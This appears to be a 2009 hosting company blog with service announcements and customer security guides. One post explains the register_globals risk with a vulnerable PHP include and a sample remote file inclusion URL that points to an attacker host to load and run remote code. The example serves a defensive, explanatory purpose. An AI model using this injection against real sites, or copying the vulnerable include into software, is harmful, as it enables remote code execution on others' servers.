15October2009
New admin panel is online
Posted by admin under: announcements.
The new system panel and helpdesk is now online ..
29August2009
We are still there
Posted by admin under: announcements.
Sorry not to post any updates since some time .. but are working hard to finish the new admin area & billing system, we are planning to release it during September 2009.
Here are some new features and improvements that will be available in the new system:
- Loading time of admin area will be 5 to 10 times faster than before.
- System will be more oriented towards Super user (manage more than 1 hosting account at once)
- Built-in helpdesk, no more helpdesk in iframe!
- Built-in online pre-configured FTP client to eliminate any network/firewall issues with FTPing.
- Reset cPanel/FTP password direct from your admin area.
- Change the account contract length at any time.
- Order more than 1 addon/extras at time, like you can order 5 addon domains at once ..etc
and more…, in fact the new system which made 100% by 2MHost will be a platform to add more improvements easily..
I hope you like it.
Norman
24June2009
REGISTER_GLOBALS = OFF
Posted by admin under: Guides.
You may aware that we finally decided to disable register_global in PHP by default in all servers, which annoyed some users … and while I was reading this great book I found a good example in how easy to HACK/CRAK PHP website when register_globals is turned ON:
imagine index.php file that contains the following code:
<?php
require_once ($basedir.’/somecode.php’);
// More code that is perfectly safe follows
?>
The code above usually found in %99 of any PHP software, code simply includes legitimate somecode.php PHP file that contains more PHP code and process it.
If register_globals turned ON, the hacker can request your index.php file using an url like this one:
http://www.yourwebsite.com/index.php?basedir=http://www.nastysite.com
The result is that our vulnerable code will load, and execute code in http://www.nastysite.com/somecode.php. That means that the cracker is able to load, and execute his own somecode.php, which is arbitrary PHP code, intended to hack your site.
I hope this explains why we disabled register_globals in all servers.
23June2009
Important security update!
Posted by admin under: Guides.
As many of you know there has been a large surge of hacking activity targeted websites that use open source software (Specially Joomla, PHPBB and more), The attackers are using various exploits in older versions of this open source software to gain access to whole hosting account and use the hosting account to send spam or distribute malware, we even have seen attacks that
install full software like Wikis and Forums to spam search engines and this “planned” attacks is impossible to recover and we have to terminate the infected hosting accounts.
Fortunately, %99 of this attacks can be avoided by following very easy steps:
- If you installed (or installing) PHP or CGI software to try it out (Like PHPBB forum, Joomla CMS,..etc) and you no longer use this software then simply delete it and delete its DB, if you used Fantastico installer to install the software, then use Fantastico to delete the installation.
- Same thing apply to Software plug-ins and themes, if you no longer use a theme/template then remove it, if you no longer use a plug-in then delete it
- When Installing software, always choose user name and password for software administration different than your main hosting account user name and password, if your software compromised, the attacker will not able to gain access to whole hosting account or email.
- When Installing software, Avoid using easy to guess logins like username: test and password: test
- 6, 7, 8, 9, 10: If you installed software and want to continue using it, then keep it up to date (including any themes, plug-ins, widgets), subscribe in the software mailing lists or RSS feeds to get any security updates and batch/upgrade your copy of this software as soon as possible.
As usual, feel free to contact us using the helpdesk if you have any questions.
31May2009
Something from the Past
Posted by admin under: Uncategorized.
This is full screen shot of how 2MHost website was look like in 2002 :) .. Click on the image below to enlarge.
Browse
Calendar
| M | T | W | T | F | S | S |
|---|---|---|---|---|---|---|
| « Jan | ||||||
| 1 | 2 | 3 | 4 | 5 | 6 | 7 |
| 8 | 9 | 10 | 11 | 12 | 13 | 14 |
| 15 | 16 | 17 | 18 | 19 | 20 | 21 |
| 22 | 23 | 24 | 25 | 26 | 27 | 28 |
| 29 | 30 | 31 | ||||